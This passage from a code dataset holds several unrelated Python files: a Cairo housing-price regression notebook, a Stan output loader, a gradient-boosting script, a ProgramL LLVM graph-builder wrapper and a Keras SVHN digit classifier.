pd\nimport numpy as np\nfrom pathlib import Path\n\n\n# In[519]:\n\n\nmy_file = Path(\"properties.csv\")\nif my_file.is_file()==False:\n get_ipython().system(\"wget 'https://raw.githubusercontent.com/Bahaakhalled/Egypt-Cairo-Housing/main/properties.csv'\")\n\n\n# In[520]:\n\n\nprop=pd.read_csv('properties.csv')\nprop.head()\n\n\n# In[521]:\n\n\nprop.info()\n\n\n# In[522]:\n\n\nprop.nunique()\n\n\n# In[523]:\n\n\nimport seaborn as sns\nimport string,re\n\n\n# In[524]:\n\n\ncprop=prop.copy()\n\n\n# In[525]:\n\n\ncprop.price.value_counts()\n\n\n# In[526]:\n\n\ntestingrows=cprop.loc[cprop.price=='Ask']\ncprop=cprop.drop(cprop.loc[cprop.price=='Ask'].index,axis=0)\ncprop\n\n\n# In[527]:\n\n\ncprop.title=cprop.title.apply(lambda m:m.lower())\ncprop.location=cprop.location.apply(lambda m:m.lower())\ncprop.type=cprop.type.apply(lambda m:m.lower())\n\ncprop.price=cprop.price.apply(lambda m:m.replace(',',''))\ncprop.price=cprop['price'].astype('int64')\n\n\n# In[528]:\n\n\ncprop=cprop.drop(cprop.sort_values(by='price',ascending=False).head(1).index,axis=0)\n\n\n# In[529]:\n\n\ncprop.bedroom.unique()\n\n\n# In[530]:\n\n\ncprop=cprop.drop(cprop.loc[cprop.bedroom=='{0}'].head(1).index,axis=0)\n\n\n# In[531]:\n\n\ncprop.bedroom=cprop.bedroom.apply(lambda m:m.replace('Studio','1'))\ncprop.type=cprop.type.apply(lambda m:m.replace('ivilla','villa'))\ncprop.type=cprop.type.apply(lambda m:m.replace('compound','apartment'))\ncprop.type=cprop.type.apply(lambda m:m.replace('hotel apartment','apartment'))\ncprop.bedroom=cprop['bedroom'].astype('int64')\ncprop.size_sqm=cprop.size_sqm.apply(lambda m:m.replace(',',''))\ncprop.size_sqm=cprop['size_sqm'].astype('int64')\npattern = r'[' + string.punctuation + ']'\ncprop['title']=cprop['title'].map(lambda m:re.sub(pattern,\" \",m))\ncprop['location']=cprop['location'].map(lambda m:re.sub(pattern,\" \",m))\n\n\n# In[532]:\n\n\nsns.set(rc={\"figure.figsize\":(25, 8)})\ncprop.hist()\n\n\n# In[533]:\n\n\ncityprop=cprop.copy()\ncityprop['City']='NA'\n\ncityprop.loc[cityprop['title'].str.contains(\"5th\"),'City']='New Cairo'\ncityprop.loc[cityprop['title'].str.contains(\"settlement\"),'City']='New Cairo'\ncityprop.loc[cityprop['title'].str.contains(\"new cairo\"),'City']='New Cairo'\ncityprop.loc[cityprop['title'].str.contains(\"tag sultan\"),'City']='New Cairo'\ncityprop.loc[cityprop['title'].str.contains(\"mivida\"),'City']='New Cairo'\ncityprop.loc[cityprop['location'].str.contains(\"5th\"),'City']='New Cairo'\ncityprop.loc[cityprop['location'].str.contains(\"settlement\"),'City']='New Cairo'\ncityprop.loc[cityprop['location'].str.contains(\"new cairo\"),'City']='New Cairo'\ncityprop.loc[cityprop['location'].str.contains(\"tag sultan\"),'City']='New Cairo'\n\n\ncityprop.loc[cityprop['title'].str.contains(\"new capital\"),'City']='New Capital'\ncityprop.loc[cityprop['location'].str.contains(\"new capital\"),'City']='New Capital'\ncityprop.loc[cityprop['title'].str.contains(\"capital\"),'City']='New Capital'\ncityprop.loc[cityprop['location'].str.contains(\"capital\"),'City']='New Capital'\n\ncityprop.loc[cityprop['title'].str.contains(\"mostakbal\"),'City']='Mostakbal City'\ncityprop.loc[cityprop['location'].str.contains(\"mostakbal\"),'City']='Mostakbal City'\n\ncityprop.loc[cityprop['title'].str.contains(\"shorouk\"),'City']='Shorouk'\ncityprop.loc[cityprop['title'].str.contains(\"madinaty\"),'City']='Shorouk'\ncityprop.loc[cityprop['location'].str.contains(\"shorouk\"),'City']='Shorouk'\ncityprop.loc[cityprop['location'].str.contains(\"madinaty\"),'City']='Shorouk'\ncityprop.loc[cityprop['title'].str.contains(\"eastown\"),'City']='Shorouk'\ncityprop.loc[cityprop['location'].str.contains(\"eastown\"),'City']='Shorouk'\n\n\ncityprop.loc[cityprop['title'].str.contains(\"heliopolis\"),'City']='New Heliopolis'\ncityprop.loc[cityprop['location'].str.contains(\"heliopolis\"),'City']='New Heliopolis'\n\n\ncityprop.loc[cityprop['location'].str.contains(\"uptown\"),'City']='Cairo'\ncityprop.loc[cityprop['title'].str.contains(\"zamalek\"),'City']='Cairo'\ncityprop.loc[cityprop['location'].str.contains(\"zamalek\"),'City']='Cairo'\ncityprop.loc[cityprop['title'].str.contains(\"mokattam\"),'City']='Cairo'\ncityprop.loc[cityprop['location'].str.contains(\"mokattam\"),'City']='Cairo'\ncityprop.loc[cityprop['title'].str.contains(\"maadi\"),'City']='Cairo'\ncityprop.loc[cityprop['location'].str.contains(\"maadi\"),'City']='Cairo'\ncityprop.loc[(cityprop['location'].str.contains(\"nasr\")) | (cityprop['title'].str.contains(\"nasr\")),'City']='Cairo'\ncityprop.loc[cityprop.City=='NA','City']='Cairo'\n\n\n# In[534]:\n\n\ncityprop.City.value_counts()\n\n\n# In[535]:\n\n\npd.set_option('display.max_colwidth', None)\ncityprop.loc[(cityprop['location'].str.contains(\"nasr city\")) & (cityprop.City=='NA')].head(50)\n\n\n# In[536]:\n\n\ncityprop.loc[(cityprop['title'].str.contains(\"apartment\")) & (cityprop.type!='apartment'),'type']='apartment'\ncityprop.loc[(cityprop['title'].str.contains(\"villa\")) & (cityprop.type!='villa'),'type']='villa'\ncityprop.loc[(cityprop['title'].str.contains(\"town\")) & (cityprop.type!='townhouse'),'type']='townhouse'\ncityprop.loc[(cityprop['title'].str.contains(\"twin\")) & (cityprop.type!='twin house'),'type']='twin house'\ncityprop.loc[(cityprop['title'].str.contains(\"duplex\")) & (cityprop.type!='duplex'),'type']='duplex'\ncityprop.loc[(cityprop['title'].str.contains(\"pent\")) & (cityprop.type!='penthouse'),'type']='penthouse'\ncityprop.loc[(cityprop['title'].str.contains(\"villa\")) & (cityprop.type!='villa'),'type']='villa'\ncityprop.loc[(cityprop['title'].str.contains(\"hotel\")) & (cityprop.type!='apartment'),'type']='apartment'\n\n\n# In[537]:\n\n\ncityprop.type.value_counts()\n\n\n# In[538]:\n\n\n#cityprop.loc[(cityprop['title'].str.contains(\"chalet\")) & (cityprop.type!='chalet')]\ncityprop=cityprop.drop(cityprop.loc[cityprop.type=='chalet'].index,axis=0)\n\n\n# In[539]:\n\n\ncityprop.type.value_counts()\n\n\n# In[540]:\n\n\nprop_with_ol=cityprop.copy()\n\n\n# In[541]:\n\n\nfrom sklearn import preprocessing\nimport matplotlib.pyplot as plt\n\nplot , ax = plt.subplots(1 , 2 , figsize = (25 , 7))\n\noutliers = (preprocessing.scale(cityprop[\"size_sqm\"]) >3)\nsns.scatterplot(data=cityprop,x=preprocessing.scale(cityprop['size_sqm']),y=preprocessing.scale(cityprop['price']),c = [\"red\" if is_outlier else \"blue\" for is_outlier in outliers],ax=ax[0])\n\ncityprop.drop(cityprop[outliers].index , inplace = True)\nsns.scatterplot(data = cityprop ,x = preprocessing.scale(cityprop['size_sqm']), y = preprocessing.scale(cityprop['price']),ax=ax[1])\n\n\n# In[542]:\n\n\nsns.set(rc={\"figure.figsize\":(25, 8)})\n\nplot , ax = plt.subplots(1 , 2 , figsize = (25 , 7))\noutliers = (((cityprop[\"bathroom\"]==3) | (cityprop[\"bathroom\"]==4)) & (preprocessing.scale(cityprop[\"price\"])>8))\nsns.scatterplot(data=cityprop,x=cityprop['bathroom'],y=preprocessing.scale(cityprop['price']),c = [\"red\" if is_outlier else \"blue\" for is_outlier in outliers],ax=ax[0])\n\ncityprop.drop(cityprop[outliers].index , inplace = True)\nsns.scatterplot(data = cityprop ,x = cityprop['bathroom'], y = preprocessing.scale(cityprop['price']),ax=ax[1])\n\n\n# In[543]:\n\n\noutliers = ((cityprop[\"bedroom\"]==6) & (preprocessing.scale(cityprop[\"price\"])>9))\n\nplot , ax = plt.subplots(2 , 2 , figsize = (25 , 7))\n\nsns.scatterplot(data=cityprop,x=cityprop['bedroom'],y=preprocessing.scale(cityprop['price']),c = [\"red\" if is_outlier else \"blue\" for is_outlier in outliers],ax=ax[0,0])\n\ncityprop.drop(cityprop[outliers].index , inplace = True)\nsns.scatterplot(data = cityprop ,x = cityprop['bedroom'], y = preprocessing.scale(cityprop['price']),ax=ax[0,1])\n\noutliers1 = ((cityprop[\"bedroom\"]==2) & (preprocessing.scale(cityprop[\"price\"])>2))\nsns.scatterplot(data=cityprop,x=cityprop['bedroom'],y=preprocessing.scale(cityprop['price']),c = [\"red\" if is_outlier else \"blue\" for is_outlier in outliers1],ax=ax[1,0])\n\ncityprop.drop(cityprop[outliers1].index , inplace = True)\nsns.scatterplot(data = cityprop ,x = cityprop['bedroom'], y = preprocessing.scale(cityprop['price']),ax=ax[1,1])\n\n\n# In[544]:\n\n\nplot , ax = plt.subplots(2 , 1 , figsize = (25 , 10))\nsns.countplot(x=cityprop[\"City\"],ax=ax[0])\nsns.countplot(x=cityprop[\"type\"],ax=ax[1])\n\n\n# In[545]:\n\n\ncityprop\n\n\n# In[546]:\n\n\ncityprop['Compound']=0\nprop_with_ol['Compound']=0\n\n\n# In[547]:\n\n\ncityprop.loc[(cityprop['location'].str.contains(\"compound\")) | (cityprop['title'].str.contains(\"compound\")),'Compound']=1\ncityprop.loc[(cityprop['location'].str.contains(\"كمبوند\")) | (cityprop['title'].str.contains(\"كمبوند\")),'Compound']=1\n\nprop_with_ol.loc[(prop_with_ol['location'].str.contains(\"compound\")) | (prop_with_ol['title'].str.contains(\"compound\")),'Compound']=1\nprop_with_ol.loc[(prop_with_ol['location'].str.contains(\"كمبوند\")) | (prop_with_ol['title'].str.contains(\"كمبوند\")),'Compound']=1\n\n\n# In[548]:\n\n\ncpd_names=pd.read_excel('compoundlist.xlsx',header=None,names=['Compound_Names'])\ncpd_names.head()\n\n\n# In[549]:\n\n\ncpd_names.Compound_Names=cpd_names.Compound_Names.map(lambda m:m.split(':',1)[0])\ncpd_names.Compound_Names=cpd_names.Compound_Names.map(lambda m:m.lower())\n\n\n# In[550]:\n\n\ns1 = pd.Series(['rehab','tag sultan','gardenia','east town','mountain','madinaty','eastown','park','villette','layan','hyde park','beit al watan','golden square','village gate','fifth square','village gate','katameya heights','swan','dyar','katameya gardens','narges','al banafsag','emar','azzar','sodic'])\ncpd_names=cpd_names.Compound_Names.append(s1, ignore_index=True)\ncpd_names.shape\n\n\n# In[551]:\n\n\ncityprop.loc[cityprop['title'].apply(lambda x: any([i in x for i in cpd_names])),'Compound']=1\ncityprop.loc[cityprop['location'].apply(lambda x: any([i in x for i in cpd_names])),'Compound']=1\n\nprop_with_ol.loc[prop_with_ol['title'].apply(lambda x: any([i in x for i in cpd_names])),'Compound']=1\nprop_with_ol.loc[prop_with_ol['location'].apply(lambda x: any([i in x for i in cpd_names])),'Compound']=1\n\n\n# In[552]:\n\n\ncityprop.loc[(cityprop['title'].str.contains(\" in \")) & (cityprop['Compound']==0)].title.map(lambda m:m.split(' in ',1)[1])\n\n\n# In[553]:\n\n\ncityprop.loc[(cityprop['Compound']==0)]\n\n\n# In[554]:\n\n\nsns.set(rc={\"figure.figsize\":(20, 5)})\nsns.countplot(x=cityprop[\"Compound\"])\n\n\n# In[555]:\n\n\nplot , ax = plt.subplots(3 , 1 , figsize = (25 , 13))\nsns.scatterplot(data=cityprop, x=\"size_sqm\", y=\"price\", hue=\"type\",ax=ax[0])\nsns.scatterplot(data=cityprop, x=\"bedroom\", y=\"price\", hue=\"type\",ax=ax[1])\nsns.scatterplot(data=cityprop, x=\"bathroom\", y=\"price\", hue=\"type\",ax=ax[2])\n\n\n# In[556]:\n\n\nfinalprop=cityprop.copy()\nfinalprop=finalprop.drop(['title','location'],axis=1)\nX=finalprop.loc[:, finalprop.columns != 'price']\ny=finalprop['price']\n\n\n# In[557]:\n\n\nprop_with_ol=prop_with_ol.drop(['title','location'],axis=1)\nX_with_ol=prop_with_ol.loc[:, prop_with_ol.columns != 'price']\ny_with_ol=prop_with_ol['price']\n\n\n# In[558]:\n\n\nfrom sklearn.preprocessing import MinMaxScaler\n\nX_dummied=pd.get_dummies(X)\nX_with_ol_dm=pd.get_dummies(X_with_ol)\n\nscaler=MinMaxScaler()\n\ndf_scaled = scaler.fit_transform(X_dummied.to_numpy())\n\nX_sc_dm = pd.DataFrame(df_scaled, columns=X_dummied.columns)\n\nX_with_ol_scaled = scaler.fit_transform(X_with_ol_dm.to_numpy())\nX_with_ol_dm_sc=pd.DataFrame(X_with_ol_scaled, columns=X_with_ol_dm.columns)\n\nprop_dm=X_dummied.copy()\nprop_dm['price']=y\n\nprop_sc_dm=X_sc_dm.copy()\nprop_sc_dm['price']=y\n\n\n# In[559]:\n\n\nsns.set(rc={\"figure.figsize\":(20, 12)})\nsns.heatmap(prop_sc_dm.corr())\n\n\n# In[560]:\n\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn import linear_model\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_absolute_error,mean_squared_error,r2_score\nfrom lightgbm import LGBMRegressor\nfrom sklearn.model_selection import train_test_split\nimport decimal\nimport xgboost as xgb\nfrom sklearn.ensemble import AdaBoostRegressor\nfrom sklearn.ensemble import GradientBoostingRegressor\n\ndef predictmodels(clf_A,clf_B,clf_C,X,y,name):\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n results = {}\n df = pd.DataFrame()\n for clf in [clf_A, clf_B, clf_C]:\n clf_name = clf.__class__.__name__\n results[clf_name] = {}\n results[clf_name] = clf = clf.fit(X_train, y_train)\n try:\n predictions_test = clf.predict(X_test)\n except:\n predictions_test = clf_A.predict(X_test)\n row={name:decimal.Decimal(r2_score(y_test,predictions_test))}\n rows=[decimal.Decimal(r2_score(y_test,predictions_test))] \n d = {clf_name: row}\n if df.empty:\n df=pd.DataFrame(data=d)\n else:\n df[clf_name]=rows\n return df\n\n\n# Scaled and Dummied/Removed Outliers\n# \n# Using the R2 score Linear models performed an almost identical 0.669 using Linear,Lasso and Polynomial\n\n# In[561]:\n\n\ndf=predictmodels(LinearRegression(),linear_model.Lasso(random_state=3),PolynomialFeatures(),X_sc_dm,y,'Scaled/Dummied/Removed Outliers')\ndf=df.transpose()\nall=df\nsns.set_style(\"white\")\ndf=predictmodels(LinearRegression(),linear_model.Lasso(random_state=3),PolynomialFeatures(),X_sc_dm,y,'Scaled/Dummied/Removed Outliers')\n\nplot , ax = plt.subplots(3 , 3 , figsize = (30 , 14))\nsns.pointplot(ax=ax[0,0],x=list(df.keys()), y=df.iloc[0].values, markers=['o'], linestyles=['-'])\nax[0,0].set_title('Scaled/Dummied/Removed Outliers', size=20)\n\n#Scaled and Dummied/Kept Outliers\n\n#Keeping outliers in Linear Models underperformed with a huge difference from a high 0.669 to a low score of 0.498\n\ndf1=predictmodels(LinearRegression(),linear_model.Lasso(random_state=3),PolynomialFeatures(),X_with_ol_dm_sc,y_with_ol,'Scaled/Dummied/Kept Outliers')\nedf1=df1.transpose()\nall[edf1.columns[0]]=edf1.iloc[:, 0]\n\nsns.pointplot(ax=ax[0,1],x=list(df1.keys()), y=df1.iloc[0].values, markers=['o'], linestyles=['-'])\nax[0,1].set_title('Scaled/Dummied/Kept Outliers', size=20)\n\n#Dummied Only/Removed Outliers\n\n#Scaling did not perform any difference in Linear Models\n\ndf2=predictmodels(LinearRegression(),linear_model.Lasso(random_state=3),PolynomialFeatures(),X_dummied,y,'Dummied/Removed Outliers')\nedf2=df2.transpose()\nall[edf2.columns[0]]=edf2.iloc[:, 0]\nsns.pointplot(ax=ax[0,2],x=list(df2.keys()), y=df2.iloc[0].values, markers=['o'], linestyles=['-'])\nax[0,2].set_title('Dummied/Removed Outliers', size=20)\n#Scaled and Dummied Without Outliers\n\n#using Ensemble Methods with scaling created a slight improvement using LGBM Regressor than that of Linear Models 0.708\ndf=predictmodels(DecisionTreeRegressor(random_state=3),RandomForestRegressor(random_state=3),LGBMRegressor(random_state=3),X_sc_dm,y,'Scaled/Dummied/Removed Outliers')\nsns.pointplot(ax=ax[1,0],x=list(df.keys()), y=df.iloc[0].values, markers=['o'], linestyles=['-'])\nax[1,0].set_ylabel('Score (R2)', size=20, labelpad=12.5)\n\nedf=df.transpose()\ntempdf=edf\n#Scaled and Dummied with Outliers\n\n#Outliers again underperforming in Ensemble Methods by a huge detoriation according to R2 Score\ndf1=predictmodels(DecisionTreeRegressor(random_state=3),RandomForestRegressor(random_state=3),LGBMRegressor(random_state=3),X_with_ol_dm_sc,y_with_ol,'Scaled/Dummied/Kept Outliers')\nsns.pointplot(ax=ax[1,1],x=list(df.keys()), y=df.iloc[0].values, markers=['o'], linestyles=['-'])\nedf1=df1.transpose()\ntempdf[edf1.columns[0]]=edf1.iloc[:, 0]\n#Dummied Only without Outliers\n\n#Scaling made no difference in all ensemble methods \n\ndf2=predictmodels(DecisionTreeRegressor(random_state=3),RandomForestRegressor(random_state=3),LGBMRegressor(random_state=3),X_dummied,y,'Dummied/Removed Outliers')\nedf2=df2.transpose()\ntempdf[edf2.columns[0]]=edf2.iloc[:, 0]\nsns.pointplot(ax=ax[1,2],x=list(df.keys()), y=df.iloc[0].values, markers=['o'], linestyles=['-'])\nall=pd.concat([all, tempdf])\n\ndf=predictmodels(xgb.XGBRegressor(random_state=3),AdaBoostRegressor(random_state=3),GradientBoostingRegressor(random_state=3),X_sc_dm,y,'Scaled/Dummied/Removed Outliers')\n#Scaled and dummied without outliers\n#Continuing with ensemble methods made no better results but a vary close result from XGB and an even closer using GBR\nedf=df.transpose()\ntempdf=edf\nsns.pointplot(ax=ax[2,0],x=list(df.keys()), y=df.iloc[0].values, markers=['o'], linestyles=['-'])\n\n\ndf1=predictmodels(xgb.XGBRegressor(random_state=3),AdaBoostRegressor(random_state=3),GradientBoostingRegressor(random_state=3),X_with_ol_dm_sc,y_with_ol,'Scaled/Dummied/Kept Outliers')\nedf1=df1.transpose()\ntempdf[edf1.columns[0]]=edf1.iloc[:, 0]\n#Scaled and Dummied with Outliers\n#Underperforming Outliers\n\nsns.pointplot(ax=ax[2,1],x=list(df1.keys()), y=df1.iloc[0].values, markers=['o'], linestyles=['-'])\n\ndf2=predictmodels(xgb.XGBRegressor(random_state=3),AdaBoostRegressor(random_state=3),GradientBoostingRegressor(random_state=3),X_dummied,y,'Dummied/Removed Outliers')\nedf2=df2.transpose()\ntempdf[edf2.columns[0]]=edf2.iloc[:, 0]\nsns.pointplot(ax=ax[2,2],x=list(df.keys()), y=df.iloc[0].values, markers=['o'], linestyles=['-'])\n\n\nall=pd.concat([all, tempdf])\n\n\n# In[562]:\n\n\nall=all.reset_index().rename(columns={'index':'Model'})\n\n\n# In[563]:\n\n\nall.sort_values(by=['Scaled/Dummied/Removed Outliers','Scaled/Dummied/Kept Outliers','Dummied/Removed Outliers'],ascending=False)\n\n\n# We see and obvious positive change in results in all models when outliers were removed\n\n# In[564]:\n\n\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import make_scorer\n\ndef Gridsrch(clf):\n parameters={'n_estimators':[50,100,200,300,500,1000],'learning_rate':[0.01,0.05,0.1]}\n\n scorer=make_scorer(mean_squared_error)\n\n grid_layout=GridSearchCV(clf,parameters,scoring=scorer)\n\n grid_fit=grid_layout.fit(X_train,y_train)\n\n best_clf=grid_fit.best_estimator_\n\n #predict using plane and optimized model\n predictions=(clf.fit(X_train,y_train).predict(X_test))\n best_predictions=best_clf.predict(X_test)\n print(str(clf) +\" before Optimization: \" + str(mean_squared_error(y_test,predictions)))\n print(str(clf) +\" after Optimization: \" + str(mean_squared_error(y_test,best_predictions)))\n print(str(clf) +\" after Optimization R2: \" + str(r2_score(y_test,best_predictions)))\n print(grid_fit.best_params_)\n return grid_fit\n\n\n# In[565]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X_sc_dm, y, test_size = 0.2, random_state = 0)\ngrid_fit=Gridsrch(LGBMRegressor(random_state=3))\n\n\n# In[566]:\n\n\ndef plot_grid_search(cv_results, grid_param_1, grid_param_2, name_param_1, name_param_2):\n scores_mean = cv_results['mean_test_score']\n scores_mean = np.array(scores_mean).reshape(len(grid_param_2),len(grid_param_1))\n\n scores_sd = cv_results['std_test_score']\n scores_sd = np.array(scores_sd).reshape(len(grid_param_2),len(grid_param_1))\n\n _, ax = plt.subplots(1,1)\n\n for idx, val in enumerate(grid_param_2):\n ax.plot(grid_param_1, scores_mean[idx,:], '-o', label= name_param_2 + ': ' + str(val))\n\n ax.set_title(\"Grid Search Scores\", fontsize=20, fontweight='bold')\n ax.set_xlabel(name_param_1, fontsize=16)\n ax.set_ylabel('CV Average Score', fontsize=16)\n ax.legend(loc=\"best\", fontsize=15)\n ax.grid('on')\n\n\n# In[567]:\n\n\nplot_grid_search(grid_fit.cv_results_, [50,100,200,300,500,1000], [0.01,0.05,0.1], 'N Estimators', 'Learning Rate')\n\n","repo_name":"Bahaakhalled/Egypt-Cairo-Housing","sub_path":"Notebook.py","file_name":"Notebook.py","file_ext":"py","file_size_in_byte":19284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2070268428","text":"import json\nfrom dataclasses import dataclass\nimport pandas as pd\nimport numpy as np\n\n@dataclass\nclass SpaOutput:\n dataframe: pd.DataFrame\n num_warmup_draws: int\n variable_prefixes_excluded: list[str]\n\ndef load_spa_out(sp_out_fname: str):\n with open(sp_out_fname) as f:\n sp_out = json.load(f)\n chains = sp_out['chains']\n variable_names: list[str] = []\n for chain in chains:\n for variable_name in chain['sequences']:\n if variable_name not in variable_names:\n variable_names.append(variable_name)\n variable_names.sort()\n df = pd.DataFrame(columns=['chain_id', 'draw'] + variable_names)\n for chain in chains:\n chain_id = chain['chainId']\n chain_id_num = int(chain_id.split('_')[-1])\n variable_values: list(np.array) = []\n for variable_name in variable_names:\n if variable_name in chain['sequences']:\n variable_values.append(np.array(chain['sequences'][variable_name]))\n else:\n variable_values.append(np.full_like(variable_values[0], np.nan))\n num_draws = len(variable_values[0])\n for draw in range(num_draws):\n row = [chain_id_num, draw + 1]\n for variable_value in variable_values:\n row.append(variable_value[draw])\n df.loc[len(df)] = row\n return SpaOutput(\n dataframe=df,\n num_warmup_draws=chains[0]['numWarmupDraws'],\n variable_prefixes_excluded=chains[0]['variablePrefixesExcluded']\n )","repo_name":"flatironinstitute/stan-playground","sub_path":"devel/sp_utils.py","file_name":"sp_utils.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1074613280","text":"import pandas as pd\nimport numpy as np\nimport time\nfrom evaluate import evaluate,show_metric,compute_tpr_fpr\n\nfile = 'train_cleaned_version4.csv'\ndf = pd.read_csv(file,index_col = 0,nrows = 50000)\n\nmissing_label_df = df[df['label']==-1]\ndf = df[df['label'] != -1]\n\n# df.drop(['date'],axis=1,inplace=True)\n# negative_df = df[df['label']==0]\n# positive_df = df[df['label']==1]\n# subnegative_df = negative_df.sample(n = len(positive_df) * 60)\n# df = positive_df.append(subnegative_df)\n\nfrom train_val_test_split import get_train_val_test_split\ntrain_X, train_y, validation_X, validation_y, test_X, test_y = get_train_val_test_split(df,6,3,1)\n\nfrom sklearn.ensemble import GradientBoostingClassifier\ncv_clf = GradientBoostingClassifier(n_estimators = 250, max_depth=3,tol=0.0001,verbose=10,random_state=10)\ncv_clf.fit(train_X,train_y)\n\ny_true = validation_y\ny_pred = cv_clf.predict_proba(validation_X)[:,1]\nstart = time.time()\nprint(\"evaluation metric: \", evaluate(y_true,y_pred))\nend = time.time()\nprint(end - start, 'seconds')\nshow_metric(y_true,y_pred)\ntpr,fpr = compute_tpr_fpr(validation_y,y_pred)\nprint(\"True positive rate: {}, False positive rate: {}\".format(tpr,fpr))\nprint('*'*60)\n","repo_name":"XinyiYS/import-torch-as-tf","sub_path":"gdbt.py","file_name":"gdbt.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40401364139","text":"import subprocess\nimport tempfile\n\nfrom programl.proto import program_graph_options_pb2, program_graph_pb2\nfrom programl.util.py.runfiles_path import runfiles_path\n\nGRAPH_BUILDER_BIN = runfiles_path(\"programl/programl/ir/llvm/py/graph_builder_bin\")\n\nDefaultOptions = program_graph_options_pb2.ProgramGraphOptions()\n\n\ndef BuildProgramGraph(\n ir: str,\n options: program_graph_options_pb2.ProgramGraphOptions = DefaultOptions,\n timeout: int = 60,\n) -> program_graph_pb2.ProgramGraph:\n \"\"\"Construct a program graph from an LLVM-IR.\n\n Args:\n ir: The text of an LLVM-IR Module.\n options: The graph construction options.\n timeout: The number of seconds to permit before timing out.\n\n Returns:\n A ProgramGraph instance.\n\n Raises:\n ValueError: In case graph construction fails.\n TimeoutError: If timeout is reached.\n OsError: In case of other error.\n \"\"\"\n # Write the ProgramGraphOptions to a temporary file and pass it to a\n # worker subprocess which generates the graph and produces a ProgramGraph\n # message on stdout.\n with tempfile.NamedTemporaryFile(\"w\") as f:\n f.write(ir)\n f.flush()\n options.ir_path = f.name\n process = subprocess.Popen(\n [\"timeout\", \"-s9\", str(timeout), str(GRAPH_BUILDER_BIN)],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n stdin=subprocess.PIPE,\n )\n stdout, stderr = process.communicate(options.SerializeToString())\n\n proto = program_graph_pb2.ProgramGraph()\n if process.returncode == 2:\n raise ValueError(stderr.decode(\"utf-8\").rstrip())\n elif process.returncode == 9 or process.returncode == -9:\n raise TimeoutError(f\"Program graph construction exceeded {timeout} seconds\")\n elif process.returncode:\n raise OSError(stderr.decode(\"utf-8\").rstrip())\n proto.ParseFromString(stdout)\n return proto\n","repo_name":"CGCL-codes/naturalcc","sub_path":"third_party/programl/programl/ir/llvm/py/llvm.py","file_name":"llvm.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"53"} +{"seq_id":"36517224758","text":"import numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport matplotlib.pylab as plt\nimport tensorflow as tf\n\nSEED = 123 # to be able to rerun the same NN\nnp.random.seed(SEED)\ntf.set_random_seed(SEED)\n\nnp.set_printoptions(precision=4, suppress=True, floatmode='fixed')\n\nget_ipython().run_line_magic('matplotlib','inline')\nimport scipy.io as sio\nfrom keras.utils import to_categorical\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten, Conv2D, MaxPooling2D\nfrom sklearn.metrics import f1_score\n\ndef test(filename):\n from keras.models import load_model\n import cv2\n import matplotlib.pyplot as plt\n import matplotlib.image as mpimg\n from scipy.misc import imresize\n model = load_model('my_model.h5')\n model.load_weights('my_model_weights.h5')\n global classes\n classes = [0,1,2,3,4,5,6,7,8,9]\n image=filename\n img_plt=mpimg.imread(image)\n img=cv2.imread(image)\n image_size=(32,32)\n img=imresize(img,image_size)\n img = np.expand_dims(img, axis=0)\n arr=model.predict(img)\n index=np.where(arr==1.0000)[1]\n predicted=classes[index[0]]\n print('Predicted Number: %d' % predicted)\n plt.imshow(img_plt)\n plt.show()\n \n \ndef traintest():\n \n import urllib.request\n\n get_ipython().run_line_magic('mkdir', 'data')\n\n urllib.request.urlretrieve(\"http://ufldl.stanford.edu/housenumbers/train_32x32.mat\", \"data/train_32x32.mat\")\n urllib.request.urlretrieve(\"http://ufldl.stanford.edu/housenumbers/test_32x32.mat\", \"data/test_32x32.mat\")\n urllib.request.urlretrieve(\"http://ufldl.stanford.edu/housenumbers/extra_32x32.mat\", \"data/extra_32x32.mat\")\n\n train_data = sio.loadmat('data/train_32x32.mat')\n test_data = sio.loadmat('data/test_32x32.mat')\n extra_data = sio.loadmat('data/extra_32x32.mat')\n\n\n X_train, y_train = train_data['X'], train_data['y']\n X_test, y_test = test_data['X'], test_data['y']\n X_extra, y_extra = extra_data['X'], extra_data['y']\n\n global classes\n classes = [0,1,2,3,4,5,6,7,8,9]\n nb_classes = 10\n \n y_train[y_train == 10] = 0\n y_test[y_test == 10] = 0\n y_extra[y_extra == 10] = 0\n\n #print(X_train.shape, X_test.shape, X_extra.shape)\n \n X_train = np.transpose(X_train,(3,0,1,2))\n X_test = np.transpose(X_test,(3,0,1,2))\n X_extra = np.transpose(X_extra,(3,0,1,2))\n\n X_train = np.concatenate([X_train, X_extra])\n y_train = np.concatenate([y_train, y_extra])\n\n X_train = X_train.astype('float32') / 255\n X_test = X_test.astype('float32') / 255\n\n y_train = to_categorical(y_train)\n y_test = to_categorical(y_test)\n #y_train[:4]\n \n model = Sequential()\n\n model.add(Conv2D(64, kernel_size=(3, 3), activation='relu', input_shape=X_train[0].shape))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Conv2D(128, kernel_size=(3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Flatten())\n model.add(Dense(len(y_train[0]), activation='softmax'))\n\n model.compile(loss='categorical_crossentropy',\n optimizer='adadelta', \n metrics=['accuracy'])\n \n #model.summary()\n model_history = model.fit(X_train, y_train, batch_size=128, epochs=5, validation_split = 0.1)\n score = model.evaluate(X_test, y_test, verbose=0)\n print('Test score:', score[0])\n print('Test accuracy:', score[1])\n \n \n \n model.save('my_model.h5') # creates a HDF5 file 'my_model.h5'# returns a compiled model\n model.save_weights('my_model_weights.h5')\n \n y_pred = model.predict(X_test, batch_size=64, verbose=1)\n y_pred_bool = np.argmax(y_pred,axis=1)\n 